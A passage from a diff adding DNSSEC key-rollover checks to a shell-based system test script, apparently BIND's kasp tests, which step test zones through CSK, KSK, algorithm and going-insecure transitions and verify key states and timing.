+check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DNSKEY can be removed. This is when all ZRRSIG +# records have been replaced with signatures of the new CSK. We have +# calculated the interval to be 26d3h of which 4h (Iret(KSK)) plus +# 2h (DNSKEY TTL + Dprp) have already passed. So next key event is in +# 26d3h - 4h - 2h = 621h = 2235600 seconds. +check_next_key_event 2235600 + +# +# Zone: step6.csk-roll.autosign. +# +set_zone "step6.csk-roll.autosign" +set_policy "csk-roll" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) ZRRSIG records are now all hidden (so the DNSKEY can +# be removed). +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_ZRRSIG" "hidden" +# The new CSK (KEY2) is now fully OMNIPRESENT. +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times +# - This key was activated 5091 hours ago (18327600 seconds). +csk_rollover_predecessor_keytimes -18327600 +# - The new CSK is activated 627 hours ago (2257200 seconds). +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "ACTIVE" "${created}" -2257200 +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -2257200 +syncpub=$(key_get KEY2 SYNCPUBLISH) +set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DNSKEY enters the HIDDEN state. This is the +# DNSKEY TTL plus zone propagation delay. For the csk-roll policy this is: +# 1h + 1h = 7200 seconds. +check_next_key_event 7200 + +# +# Zone: step7.csk-roll.autosign. +# +set_zone "step7.csk-roll.autosign" +set_policy "csk-roll" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) is now completely HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 5093 hours ago (18334800 seconds). +csk_rollover_predecessor_keytimes -18334800 +# - The new CSK is activated 629 hours ago (2264400 seconds). +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "ACTIVE" "${created}" -2264400 +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -2264400 +syncpub=$(key_get KEY2 SYNCPUBLISH) +set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the new successor needs to be published. +# This is the Lcsk, minus time passed since the key started signing, +# minus the prepublication time. +# Lcsk: 186d (16070400 seconds) +# Time passed: 629h (2264400 seconds) +# Ipub: 3h (10800 seconds) +check_next_key_event 13795200 + +# +# Zone: step8.csk-roll.autosign. +# +set_zone "step8.csk-roll.autosign" +set_policy "csk-roll" "1" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) is purged. +key_clear "KEY1" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Testing CSK key rollover (2). +# + +# Policy parameters. +# Lcsk: 186 days (16070400 seconds) +# Dreg: N/A +# Iret(KSK): DS TTL (1h) + DprpP (1w) + retire-safety (1h) +# Iret(KSK): 170h (61200 seconds) +# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (12h) + retire-safety (1h) +# Iret(ZSK): 38h (136800 seconds) +Lcsk=16070400 +IretKSK=612000 +IretZSK=136800 +IretCSK=$IretKSK + +# +# Zone: step1.csk-roll2.autosign. +# +set_zone "step1.csk-roll2.autosign" +set_policy "csk-roll2" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "16070400" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# The CSK (KEY1) starts in OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# Initially only one key. +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# This key is immediately published and activated. +csk_rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor CSK needs to be published. +# This is Lcsk - Ipub. +# Lcsk: 186d (16070400 seconds) +# Ipub: 3h (10800 seconds) +# Total: 186d3h (16059600 seconds) +check_next_key_event 16059600 + +# +# Zone: step2.csk-roll2.autosign. +# +set_zone "step2.csk-roll2.autosign" +set_policy "csk-roll2" "2" "3600" +set_server "ns3" "10.53.0.3" +# New CSK (KEY2) is prepublished (signs DNSKEY RRset, but not yet other RRsets). +key_clear "KEY2" +set_keyrole "KEY2" "csk" +set_keylifetime "KEY2" "16070400" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" +# Key states. +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_KRRSIG" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "hidden" +set_keystate "KEY2" "STATE_DS" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4461 hours ago (16059600 seconds). +csk_rollover_predecessor_keytimes -16059600 +# - The new CSK is published now. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "PUBLISHED" "${created}" +# - The new CSK should publish the CDS after the prepublication time. +# - Ipub: 3 hour (10800 seconds) +Ipub="10800" +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" "${Ipub}" +set_addkeytime "KEY2" "ACTIVE" "${created}" "${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor CSK becomes OMNIPRESENT. That is the +# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For +# the csk-roll2 policy, this means 3h hours = 10800 seconds. +check_next_key_event 10800 + +# +# Zone: step3.csk-roll2.autosign. +# +set_zone "step3.csk-roll2.autosign" +set_policy "csk-roll2" "2" "3600" +set_server "ns3" "10.53.0.3" +# CSK (KEY1) can be removed, so move to UNRETENTIVE. +set_zonesigning "KEY1" "no" +set_keystate "KEY1" "STATE_ZRRSIG" "unretentive" +# New CSK (KEY2) DNSKEY is OMNIPRESENT, so move ZRRSIG to RUMOURED state. +set_zonesigning "KEY2" "yes" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" +# The old DS (KEY1) can be withdrawn and the new DS (KEY2) can be introduced. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY2" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY2 + +# Set expected key times: +# - This key was activated 186 days ago (16070400 seconds). +csk_rollover_predecessor_keytimes -16070400 +# - The new CSK is published three hours ago, CDS must be published now. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" "-${Ipub}" +set_keytime "KEY2" "SYNCPUBLISH" "${created}" +# - Also signatures are being introduced now. +set_keytime "KEY2" "ACTIVE" "${created}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +# Subdomain still has good signatures of old CSK (KEY1). +# Set expected zone signing on for KEY1 and off for KEY2, +# testing whether signatures which are still valid are being reused. +set_zonesigning "KEY1" "yes" +set_zonesigning "KEY2" "no" +check_subdomain +# Restore the expected zone signing properties. +set_zonesigning "KEY1" "no" +set_zonesigning "KEY2" "yes" +dnssec_verify + +# We ignore any parent registration delay, so set the DS publish time to now. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY2 "now" "published" "$ZONE" +# Next key event is when the predecessor ZRRSIG records have been replaced +# with that of the successor and enough time has passed such that the all +# validators that have such signed RRsets in cache only know about the +# successor signatures. This is the retire interval: Dsgn plus the +# maximum zone TTL plus the zone propagation delay plus retire-safety. For the +# csk-roll2 policy that means: 12h (because 1d validity and refresh within +# 12 hours) + 1d + 1h + 1h = 38h = 136800 seconds. Prevent intermittent false +# positives on slow platforms by subtracting the number of seconds which +# passed between key creation and invoking 'rndc dnssec -checkds'. +now="$(TZ=UTC date +%s)" +time_passed=$((now-start_time)) +next_time=$((136800-time_passed)) +check_next_key_event $next_time + +# +# Zone: step4.csk-roll2.autosign. +# +set_zone "step4.csk-roll2.autosign" +set_policy "csk-roll2" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) ZRRSIG is now HIDDEN. +set_keystate "KEY1" "STATE_ZRRSIG" "hidden" +# The new CSK (KEY2) ZRRSIG is now OMNIPRESENT. +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4502 hours ago (16207200 seconds). +csk_rollover_predecessor_keytimes -16207200 +# - The new CSK was published 41 hours (147600 seconds) ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -147600 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" +set_addkeytime "KEY2" "ACTIVE" "${published}" "${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the predecessor DS has been replaced with the +# successor DS and enough time has passed such that the all validators that +# have this DS RRset cached only know about the successor DS. This is the +# registration delay plus the retire interval, which is the parent +# propagation delay plus the DS TTL plus the retire-safety. For the +# csk-roll2 policy this means: 1w + 1h + 1h = 170h = 612000 seconds. +# However, 136800 seconds have passed already, so 478800 seconds left. +check_next_key_event 475200 + +# +# Zone: step5.csk-roll2.autosign. +# +set_zone "step5.csk-roll2.autosign" +set_policy "csk-roll2" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) DNSKEY can be removed. +set_keysigning "KEY1" "no" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" +# The new CSK (KEY2) is now fully OMNIPRESENT. +set_keystate "KEY2" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4634 hours ago (16682400 seconds). +csk_rollover_predecessor_keytimes -16682400 +# - The new CSK was published 173 hours (622800 seconds) ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -622800 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" +set_addkeytime "KEY2" "ACTIVE" "${published}" "${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DNSKEY enters the HIDDEN state. This is the +# DNSKEY TTL plus zone propagation delay. For the csk-roll policy this is: +# 1h + 1h = 7200 seconds. +check_next_key_event 7200 + +# +# Zone: step6.csk-roll2.autosign. +# +set_zone "step6.csk-roll2.autosign" +set_policy "csk-roll2" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) is now completely HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" +set_keystate "KEY1" "STATE_KRRSIG" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4636 hours ago (16689600 seconds). +csk_rollover_predecessor_keytimes -16689600 +# - The new CSK was published 175 hours (630000 seconds) ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -630000 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" +set_addkeytime "KEY2" "ACTIVE" "${published}" "${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the new successor needs to be published. +# This is the Lcsk, minus time passed since the key was published. +# Lcsk: 186d (16070400 seconds) +# Time passed: 175h (630000 seconds) +check_next_key_event 15440400 + +# +# Zone: step7.csk-roll2.autosign. +# +set_zone "step7.csk-roll2.autosign" +set_policy "csk-roll2" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) could have been purged, but purge-keys is disabled. + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Test #2375: Scheduled rollovers are happening faster than they can finish +# +set_zone "three-is-a-crowd.kasp" +set_policy "ksk-doubleksk" "3" "7200" +set_server "ns3" "10.53.0.3" +CDNSKEY="no" +# These are the same time values as calculated for ksk-doubleksk. +Lksk=5184000 +Lzsk=31536000 +IretKSK=180000 +IretZSK=867600 +# KSK (KEY1) is outgoing. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "${Lksk}" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "unretentive" +# KSK (KEY2) is incoming. +key_clear "KEY2" +set_keyrole "KEY2" "ksk" +set_keylifetime "KEY2" "${Lksk}" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY2" "STATE_DS" "rumoured" +# We will introduce the third KSK shortly. +key_clear "KEY3" +# ZSK (KEY4). +key_clear "KEY4" +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "${Lzsk}" +set_keyalgorithm "KEY4" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY4" "STATE_ZRRSIG" "omnipresent" +# Run preliminary tests. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify +# Roll over KEY2. +# Set expected key lifetime, which is DNSKEY TTL plus the zone propagation delay, +# plus the publish-safety: 7200s + 1h + 1d = 97200 seconds. +set_keylifetime "KEY2" "97200" +created=$(key_get KEY2 CREATED) +rndc_rollover "$SERVER" "$DIR" $(key_get KEY2 ID) "${created}" "$ZONE" +# Update expected number of keys and key states. +set_keystate "KEY2" "GOAL" "hidden" +set_policy "ksk-doubleksk" "4" "7200" +CDNSKEY="no" +# New KSK (KEY3) is introduced. +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "${Lksk}" +set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" +# Run tests again. We now expect four keys (3x KSK, 1x ZSK). +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Test dynamic zones that switch to inline-signing. +set_zone "dynamic2inline.kasp" +set_policy "default" "1" "3600" +set_server "ns6" "10.53.0.6" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# The CSK is rumoured. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Testing algorithm rollover. +# +Lksk=0 +Lzsk=0 +IretKSK=0 +IretZSK=0 + +# +# Zone: step1.algorithm-roll.kasp +# +set_zone "step1.algorithm-roll.kasp" +set_policy "rsasha256" "2" "3600" +set_server "ns6" "10.53.0.6" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +key_clear "KEY3" +key_clear "KEY4" + +# The KSK (KEY1) and ZSK (KEY2) start in OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# These keys are immediately published and activated. +rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor keys need to be published. +# Since the lifetime of the keys are unlimited, so default to loadkeys +# interval. +check_next_key_event 3600 + +# +# Zone: step1.csk-algorithm-roll.kasp +# +set_zone "step1.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "1" "3600" +set_server "ns6" "10.53.0.6" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" +# The CSK (KEY1) starts in OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# This key is immediately published and activated. +Lcsk=0 +IretCSK=0 +csk_rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor keys need to be published. +# Since the lifetime of the keys are unlimited, so default to loadkeys +# interval. +check_next_key_event 3600 + +# +# Testing going insecure. +# + +# +# Zone step1.going-insecure.kasp +# +set_zone "step1.going-insecure.kasp" +set_policy "unsigning" "2" "7200" +set_server "ns6" "10.53.0.6" + +# Policy parameters. +# Lksk: 0 +# Lzsk: 60 days (5184000 seconds) +# Iret(KSK): DS TTL (1d) + DprpP (1h) + retire-safety (1h) +# Iret(KSK): 1d2h (93600 seconds) +# Iret(ZSK): RRSIG TTL (1d) + Dprp (5m) + Dsgn (9d) + retire-safety (1h) +# Iret(ZSK): 10d1h5m (867900 seconds) +Lksk=0 +Lzsk=5184000 +IretKSK=93600 +IretZSK=867900 + +init_migration_insecure() { + key_clear "KEY1" + set_keyrole "KEY1" "ksk" + set_keylifetime "KEY1" "${Lksk}" + set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" + set_keysigning "KEY1" "yes" + set_zonesigning "KEY1" "no" + + set_keystate "KEY1" "GOAL" "omnipresent" + set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" + set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" + set_keystate "KEY1" "STATE_DS" "omnipresent" + + key_clear "KEY2" + set_keyrole "KEY2" "zsk" + set_keylifetime "KEY2" "${Lzsk}" + set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" + set_keysigning "KEY2" "no" + set_zonesigning "KEY2" "yes" + + set_keystate "KEY2" "GOAL" "omnipresent" + set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" + set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" + + key_clear "KEY3" + key_clear "KEY4" +} +init_migration_insecure + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# We have set the timing metadata to now - 10 days (864000 seconds). +rollover_predecessor_keytimes -864000 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone step1.going-insecure-dynamic.kasp +# + +set_zone "step1.going-insecure-dynamic.kasp" +set_dynamic +set_policy "unsigning" "2" "7200" +set_server "ns6" "10.53.0.6" +init_migration_insecure + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# We have set the timing metadata to now - 10 days (864000 seconds). +rollover_predecessor_keytimes -864000 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone step1.going-straight-to-none.kasp +# +set_zone "step1.going-straight-to-none.kasp" +set_policy "default" "1" "3600" +set_server "ns6" "10.53.0.6" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# This policy only has one key. +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The first key is immediately published and activated. +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${created}" +set_keytime "KEY1" "ACTIVE" "${created}" +set_keytime "KEY1" "SYNCPUBLISH" "${created}" +# Key lifetime is unlimited, so not setting RETIRED and REMOVED. +check_keytimes + +check_apex +check_subdomain +dnssec_verify + +# Reconfig dnssec-policy (triggering algorithm roll and other dnssec-policy +# changes). +echo_i "reconfig dnssec-policy to trigger algorithm rollover" +copy_setports ns6/named2.conf.in ns6/named.conf +rndc_reconfig ns6 10.53.0.6 + +# Calculate time passed to correctly check for next key events. +now="$(TZ=UTC date +%s)" +time_passed=$((now-start_time)) +echo_i "${time_passed} seconds passed between start of tests and reconfig" + +# Wait until we have seen "zone_rekey done:" message for this key. +_wait_for_done_signing() { + _zone=$1 + + _ksk=$(key_get $2 KSK) + _zsk=$(key_get $2 ZSK) + if [ "$_ksk" = "yes" ]; then + _role="KSK" + _expect_type=EXPECT_KRRSIG + elif [ "$_zsk" = "yes" ]; then + _role="ZSK" + _expect_type=EXPECT_ZRRSIG + fi + + if [ "$(key_get ${2} $_expect_type)" = "yes" ] && [ "$(key_get $2 $_role)" = "yes" ]; then + _keyid=$(key_get $2 ID) + _keyalg=$(key_get $2 ALG_STR) + echo_i "wait for zone ${_zone} is done signing with $2 ${_zone}/${_keyalg}/${_keyid}" + grep "zone_rekey done: key ${_keyid}/${_keyalg}" "${DIR}/named.run" > /dev/null || return 1 + fi + + return 0 +} + +wait_for_done_signing() { + n=$((n+1)) + echo_i "wait for zone ${ZONE} is done signing ($n)" + ret=0 + + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY1 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY2 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY3 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY4 || ret=1 + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Test dynamic zones that switch to inline-signing. +set_zone "dynamic2inline.kasp" +set_policy "default" "1" "3600" +set_server "ns6" "10.53.0.6" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# The CSK is rumoured. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Testing going insecure. +# + +# +# Zone: step1.going-insecure.kasp +# +set_zone "step1.going-insecure.kasp" +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" +# Expect a CDS/CDNSKEY Delete Record. +set_cdsdelete + +# Key goal states should be HIDDEN. +init_migration_insecure +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY2" "GOAL" "hidden" +# The DS may be removed if we are going insecure. +set_keystate "KEY1" "STATE_DS" "unretentive" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Tell named that the DS has been removed. +rndc_checkds "$SERVER" "$DIR" "KEY1" "now" "withdrawn" "$ZONE" +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DS becomes HIDDEN. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 1h + 1d = 26h = 93600 seconds. +check_next_key_event 93600 + +# +# Zone: step2.going-insecure.kasp +# +set_zone "step2.going-insecure.kasp" +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" + +# The DS is long enough removed from the zone to be considered HIDDEN. +# This means the DNSKEY and the KSK signatures can be removed. +set_keystate "KEY1" "STATE_DS" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keysigning "KEY1" "no" + +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +set_zonesigning "KEY2" "no" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +# Next key event is when the DNSKEY becomes HIDDEN. This happens after the +# propagation delay, plus DNSKEY TTL: +# 5m + 2h = 125m = 7500 seconds. +check_next_key_event 7500 + +# +# Zone: step1.going-insecure-dynamic.kasp +# +set_zone "step1.going-insecure-dynamic.kasp" +set_dynamic +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" +# Expect a CDS/CDNSKEY Delete Record. +set_cdsdelete + +# Key goal states should be HIDDEN. +init_migration_insecure +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY2" "GOAL" "hidden" +# The DS may be removed if we are going insecure. +set_keystate "KEY1" "STATE_DS" "unretentive" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Tell named that the DS has been removed. +rndc_checkds "$SERVER" 